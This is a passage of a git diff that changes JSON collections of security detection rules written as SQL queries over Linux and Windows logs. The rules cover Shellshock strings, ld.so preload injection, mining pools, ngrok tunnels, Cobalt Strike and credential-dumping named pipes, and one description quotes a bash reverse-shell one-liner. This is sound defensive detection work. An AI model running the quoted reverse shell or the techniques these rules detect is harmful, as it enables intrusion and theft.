('\"(){:;};\" OR \"() {:;};\" OR \"() { :;};\" OR \"() { :; };\"'))" ], - "filename": "proc_creation_lnx_file_deletion.yml" + "filename": "lnx_shellshock.yml" }, { - "title": "Linux Base64 Encoded Shebang In CLI", - "id": "fe2f9663-41cb-47e2-b954-8a228f3b9dff", - "description": "Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Code Injection by ld.so Preload", + "id": "7e3c4651-c347-40c4-b1d4-d48590fdf684", + "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1140" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.006" ], "falsepositives": [ - "Legitimate administration activities" + "Rare temporary workaround for library misconfiguration" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (CommandLine LIKE '%IyEvYmluL2Jhc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL2Rhc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL3pza%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL2Zpc2%' ESCAPE '\\' OR CommandLine LIKE '%IyEvYmluL3No%' ESCAPE '\\')" + "SELECT * FROM logs WHERE logs MATCH ('\"/etc/ld.so.preload\"')" ], - "filename": "proc_creation_lnx_base64_shebang_cli.yml" + "filename": "lnx_ldso_preload_injection.yml" }, { - "title": "System Information Discovery", - "id": "42df45e7-e6e9-43b5-8f26-bec5b39cc239", - "description": "Detects system information discovery commands", - "author": "Ömer Günal, oscd.community", + "title": "Suspicious Log Entries", + "id": "f64b6e9a-5d9d-48a5-8289-e1dd2b3876e1", + "description": "Detects suspicious log entries in Linux log files", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.impact" ], "falsepositives": [ - "Legitimate administration activities" + "Unknown" ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/uname' ESCAPE '\\' OR Image LIKE '%/hostname' ESCAPE '\\' OR Image LIKE '%/uptime' ESCAPE '\\' OR Image LIKE '%/lspci' ESCAPE '\\' OR Image LIKE '%/dmidecode' ESCAPE '\\' OR Image LIKE '%/lscpu' ESCAPE '\\' OR Image LIKE '%/lsmod' ESCAPE '\\')" + "SELECT * FROM logs WHERE (logs MATCH ('\"entered promiscuous mode\" OR \"Deactivating service\" OR \"Oversized packet received from\" OR \"imuxsock begins to drop messages\"'))" ], - "filename": "proc_creation_lnx_system_info_discovery.yml" + "filename": "lnx_shell_susp_log_entries.yml" }, { - "title": "Communication To Ngrok Tunneling Service - Linux", - "id": "19bf6fdb-7721-4f3d-867f-53467f6a5db6", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "title": "Guacamole Two Users Sharing Session Anomaly", + "id": "1edd77db-0669-4fef-9598-165bda82826d", + "description": "Detects suspicious session with two users present", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.credential_access", + "attack.t1212" ], "falsepositives": [ - "Legitimate use of ngrok" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE logs MATCH ('\"(2 users now present)\"')" ], - "filename": "net_connection_lnx_ngrok_tunnel.yml" + "filename": "lnx_guacamole_susp_guacamole.yml" }, { - "title": "Linux Reverse Shell Indicator", - "id": "83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871", - "description": "Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')", + "title": "Symlink Etc Passwd", + "id": "c67fc22a-0be5-4b4f-aad5-2b32c4b69523", + "description": "Detects suspicious command lines that look as if they would create symbolic links to /etc/passwd", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.t1204.001", + "attack.execution" + ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Image LIKE '%/bin/bash' ESCAPE '\\' AND NOT (DestinationIp IN ('127.0.0.1', '0.0.0.0')))" + "SELECT * FROM logs WHERE (logs MATCH ('\"ln -s -f /etc/passwd\" OR \"ln -s /etc/passwd\"'))" ], - "filename": "net_connection_lnx_back_connect_shell_dev.yml" + "filename": "lnx_symlink_etc_passwd.yml" }, { - "title": "Linux Crypto Mining Pool Connections", - "id": "a46c93b7-55ed-4d27-a41b-c259456c4746", - "description": "Detects process connections to a Monero crypto mining pool", + "title": "Sudo Privilege Escalation CVE-2019-14287 - Builtin", + "id": "7fcc54cb-f27d-4684-84b7-436af096f858", + "description": "Detects users trying to exploit sudo vulnerability reported in CVE-2019-14287", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.privilege_escalation", + "attack.t1068", + "attack.t1548.003", + "cve.2019.14287" + ], "falsepositives": [ - "Legitimate use of crypto miners" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream')" + "SELECT * FROM logs WHERE (USER LIKE '#-%' ESCAPE '\\' OR USER LIKE '#%4294967295' ESCAPE '\\')" ], - "filename": "net_connection_lnx_crypto_mining_indicators.yml" + "filename": "lnx_sudo_cve_2019_14287_user.yml" } ] diff --git a/rules/rules_windows_generic.json b/rules/rules_windows_generic.json index 44fc46d..0f5d608 100644 --- a/rules/rules_windows_generic.json +++ b/rules/rules_windows_generic.json @@ -1,2636 +1,2602 @@ [ { - "title": "DNS Query for MEGA.io Upload Domain - DNS Client", - "id": "66474410-b883-415f-9f8d-75345a0a66a6", + "title": "Malicious Named Pipe", + "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", "status": "test", - "description": "Detects DNS queries for subdomains used for upload to MEGA.io", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe used by known APT malware", + "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Legitimate DNS queries and usage of Mega" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%userstorage.mega.co.nz%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE '\\\\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7' ESCAPE '\\' OR PipeName LIKE '\\\\adschemerpc' ESCAPE '\\' OR PipeName LIKE '\\\\AnonymousPipe' ESCAPE '\\' OR PipeName LIKE '\\\\bc367' ESCAPE '\\' OR PipeName LIKE '\\\\bc31a7' ESCAPE '\\' OR PipeName LIKE '\\\\testPipe' ESCAPE '\\' OR PipeName LIKE '\\\\dce\\_3d' ESCAPE '\\')" ], - "filename": "win_dns_client_mega_nz.yml" + "filename": "pipe_created_mal_namedpipes.yml" }, { - "title": "Suspicious Cobalt Strike DNS Beaconing - DNS Client", - "id": "0d18728b-f5bf-4381-9dcf-915539fff6c2", + "title": "CobaltStrike Named Pipe Pattern Regex", + "id": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", "status": "test", - "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.004" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName REGEXP '\\\\mojo\\.5688\\.8052\\.(?:183894939787088877|35780273329370473)[0-9a-f]{2}' OR PipeName REGEXP '\\\\wkssvc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\ntsvcs[0-9a-f]{2}' OR PipeName REGEXP '\\\\DserNamePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\SearchTextHarvester[0-9a-f]{2}' OR PipeName REGEXP '\\\\mypipe-(?:f|h)[0-9a-f]{2}' OR PipeName REGEXP '\\\\windows\\.update\\.manager[0-9a-f]{2,3}' OR PipeName REGEXP '\\\\ntsvcs_[0-9a-f]{2}' OR PipeName REGEXP '\\\\scerpc_?[0-9a-f]{2}' OR PipeName REGEXP '\\\\PGMessagePipe[0-9a-f]{2}' OR PipeName REGEXP '\\\\MsFteWds[0-9a-f]{2}' OR PipeName REGEXP '\\\\f4c3[0-9a-f]{2}' OR PipeName REGEXP '\\\\fullduplex_[0-9a-f]{2}' OR PipeName REGEXP '\\\\msrpc_[0-9a-f]{4}' OR PipeName REGEXP '\\\\win\\\\msrpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\f53f[0-9a-f]{2}' OR PipeName REGEXP '\\\\rpc_[0-9a-f]{2}' OR PipeName REGEXP '\\\\spoolss_[0-9a-f]{2}' OR PipeName REGEXP '\\\\Winsock2\\\\CatalogChangeListener-[0-9a-f]{3}-0,')" ], - "filename": "win_dns_client__mal_cobaltstrike.yml" + "filename": "pipe_created_mal_cobaltstrike_re.yml" }, { - "title": "DNS Query for Anonfiles.com Domain - DNS Client", - "id": "29f171d7-aa47-42c7-9c7b-3c87938164d9", - "status": "experimental", - "description": "Detects DNS queries for anonfiles.com, which is an anonymous file upload platform often used for malicious purposes", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "ADFS Database Named Pipe Connection", + "id": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "status": "test", + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Rare legitimate access to anonfiles.com" + "Processes in the filter condition" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\MICROSOFT##WID\\\\tsql\\\\query' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\Microsoft.IdentityServer.ServiceHost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Identity.Health.Adfs.PshSurrogate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AzureADConnect.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Tri.Sensor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tssdis.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "win_dns_client_anonymfiles_com.yml" + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml" }, { - "title": "DNS Query for Ufile.io Upload Domain - DNS Client", - "id": "090ffaad-c01a-4879-850c-6d57da98452d", - "status": "experimental", - "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Named Pipes", + "id": "739915e4-1e70-4778-8b8a-17db02f66db1", + "status": "test", + "description": "Detects a named pipe used by Turla group samples", + "author": "Markus Neis", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.g0010", + "attack.execution", + "attack.t1106" ], "falsepositives": [ - "Legitimate DNS queries and usage of Ufile" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\atctl' ESCAPE '\\' OR PipeName LIKE '\\\\userpipe' ESCAPE '\\' OR PipeName LIKE '\\\\iehelper' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\comnap' ESCAPE '\\')" ], - "filename": "win_dns_client_ufile_io.yml" + "filename": "pipe_created_apt_turla_namedpipes.yml" }, { - "title": "Query Tor Onion Address - DNS Client", - "id": "8384bd26-bde6-4da9-8e5d-4174a7a47ca2", + "title": "CobaltStrike Named Pipe Patterns", + "id": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", "status": "test", - "description": "Detects DNS resolution of an .onion address related to Tor routing networks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "author": "Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ - "Unlikely" + "Chrome instances using the exact same pipe name \"mojo.something\"" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-DNS Client Events/Operational' AND EventID = '3008' AND QueryName LIKE '%.onion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((((PipeName LIKE '\\\\mojo.5688.8052.183894939787088877%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo.5688.8052.35780273329370473%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-f%' ESCAPE '\\' OR PipeName LIKE '\\\\mypipe-h%' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs%' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\_svc%' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss%' ESCAPE '\\' OR PipeName LIKE '\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\win\\\\msrpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc%' ESCAPE '\\' OR PipeName LIKE '\\\\f53f%' ESCAPE '\\' OR PipeName LIKE '\\\\windows.update.manager%' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester%' ESCAPE '\\' OR PipeName LIKE '\\\\DserNamePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe%' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds%' ESCAPE '\\' OR PipeName LIKE '\\\\f4c3%' ESCAPE '\\' OR PipeName LIKE '\\\\fullduplex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\rpc\\_%' ESCAPE '\\') OR (PipeName LIKE '\\\\demoagent\\_11' ESCAPE '\\' OR PipeName LIKE '\\\\demoagent\\_22' ESCAPE '\\')) OR (PipeName LIKE '\\\\Winsock2\\\\CatalogChangeListener-%' ESCAPE '\\' AND PipeName LIKE '%-0,' ESCAPE '\\')) AND NOT ((PipeName LIKE '\\\\wkssvc' ESCAPE '\\' OR PipeName LIKE '\\\\spoolss' ESCAPE '\\' OR PipeName LIKE '\\\\scerpc' ESCAPE '\\' OR PipeName LIKE '\\\\ntsvcs' ESCAPE '\\' OR PipeName LIKE '\\\\SearchTextHarvester' ESCAPE '\\' OR PipeName LIKE '\\\\PGMessagePipe' ESCAPE '\\' OR PipeName LIKE '\\\\MsFteWds' ESCAPE '\\')))" ], - "filename": "win_dns_client_tor_onion.yml" + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml" }, { - "title": "Protected Storage Service Access", - "id": "45545954-4016-43c6-855e-eae8f1c369dc", + "title": "CobaltStrike Named Pipe", + "id": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", "status": "test", - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '%IPC%' ESCAPE '\\' AND RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\MSSE-%' ESCAPE '\\' AND PipeName LIKE '%-server%' ESCAPE '\\') OR PipeName LIKE '\\\\postex\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\status\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\msagent\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\mojo\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\interprocess\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\samr\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\netlogon\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\srvsvc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\lsarpc\\_%' ESCAPE '\\' OR PipeName LIKE '\\\\wkssvc\\_%' ESCAPE '\\')" ], - "filename": "win_security_protected_storage_service_access.yml" + "filename": "pipe_created_mal_cobaltstrike.yml" }, { - "title": "DPAPI Domain Backup Key Extraction", - "id": "4ac1f50b-3bd0-4968-902d-868b4647937e", - "status": "test", - "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "PsExec Tool Execution From Suspicious Locations - PipeName", + "id": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "status": "experimental", + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. Which could indicate that the tool is being used in an attack", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.004" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ - "Unknown" + "Rare legitimate use of psexec from the locations mentioned above" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4662' AND ObjectType = 'SecretObject' AND AccessMask = '0x2' AND ObjectName LIKE '%BCKUPKEY%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (PipeName LIKE '\\\\PSEXESVC' ESCAPE '\\' AND (NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "win_security_dpapi_domain_backupkey_extraction.yml" + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - Security", - "id": "4c54ba8f-73d2-4d40-8890-d9cf1dca3d30", - "status": "test", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "DiagTrackEoP Default Named Pipe", + "id": "1f7025a6-e747-4130-aac4-961eb47015f1", + "status": "experimental", + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.privilege_escalation" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE PipeName LIKE '%thisispipe%' ESCAPE '\\'" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml" + }, + { + "title": "EfsPotato Named Pipe", + "id": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "status": "experimental", + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%&&set%' ESCAPE '\\' AND ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%-f%' ESCAPE '\\' AND (ServiceFileName LIKE '%{0}%' ESCAPE '\\' OR ServiceFileName LIKE '%{1}%' ESCAPE '\\' OR ServiceFileName LIKE '%{2}%' ESCAPE '\\' OR ServiceFileName LIKE '%{3}%' ESCAPE '\\' OR ServiceFileName LIKE '%{4}%' ESCAPE '\\' OR ServiceFileName LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((PipeName LIKE '%\\\\pipe\\\\%' ESCAPE '\\' OR PipeName LIKE '%\\\\pipe\\\\srvsvc%' ESCAPE '\\') AND NOT (PipeName LIKE '%\\\\CtxShare%' ESCAPE '\\'))" ], - "filename": "win_security_invoke_obfuscation_via_var_services_security.yml" + "filename": "pipe_created_efspotato_namedpipe.yml" }, { - "title": "Suspicious Windows ANONYMOUS LOGON Local Account Created", - "id": "1bbf25b9-8038-4154-a50b-118f2a32be27", + "title": "WMI Event Consumer Created Named Pipe", + "id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "status": "test", - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "author": "James Pemberton / @4A616D6573", + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.t1047", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND SamAccountName LIKE '%ANONYMOUS%' ESCAPE '\\' AND SamAccountName LIKE '%LOGON%' ESCAPE '\\')" + "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\'" ], - "filename": "win_security_susp_local_anon_logon_created.yml" + "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml" }, { - "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "id": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "status": "test", - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", + "title": "Koh Default Named Pipes", + "id": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "status": "experimental", + "description": "Detects creation of default named pipes used by the Koh tool", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" ], "falsepositives": [ - "Highly unlikely" + "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%cmd%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%cmd.exe%' ESCAPE '\\' AND ServiceFileName LIKE '%/c%' ESCAPE '\\' AND ServiceFileName LIKE '%echo%' ESCAPE '\\' AND ServiceFileName LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ServiceFileName LIKE '%rundll32%' ESCAPE '\\' AND ServiceFileName LIKE '%.dll,a%' ESCAPE '\\' AND ServiceFileName LIKE '%/p:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\imposecost%' ESCAPE '\\' OR PipeName LIKE '%\\\\imposingcost%' ESCAPE '\\')" ], - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" + "filename": "pipe_created_koh_default_pipe.yml" }, { - "title": "Disabling Windows Event Auditing", - "id": "69aeb277-f15f-4d2d-b32a-55e883609563", + "title": "Cred Dump-Tools Named Pipes", + "id": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", "status": "test", - "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", - "author": "@neu5ron", + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "author": "Teymur Kheirkhabarov, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator using tool for password recovery" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (PipeName LIKE '%\\\\lsadump%' ESCAPE '\\' OR PipeName LIKE '%\\\\cachedump%' ESCAPE '\\' OR PipeName LIKE '%\\\\wceservicepipe%' ESCAPE '\\')" ], - "filename": "win_security_disable_event_logging.yml" + "filename": "pipe_created_cred_dump_tools_named_pipes.yml" }, { - "title": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "id": "6fb63b40-e02a-403e-9ffd-3bcc1d749442", + "title": "Sysmon Configuration Error", + "id": "815cd91b-7dbc-4247-841a-d7dd1392b0a8", "status": "experimental", - "description": "Detects usage of Metasploit SMB PsExec (exploit/windows/smb/psexec) and Impacket 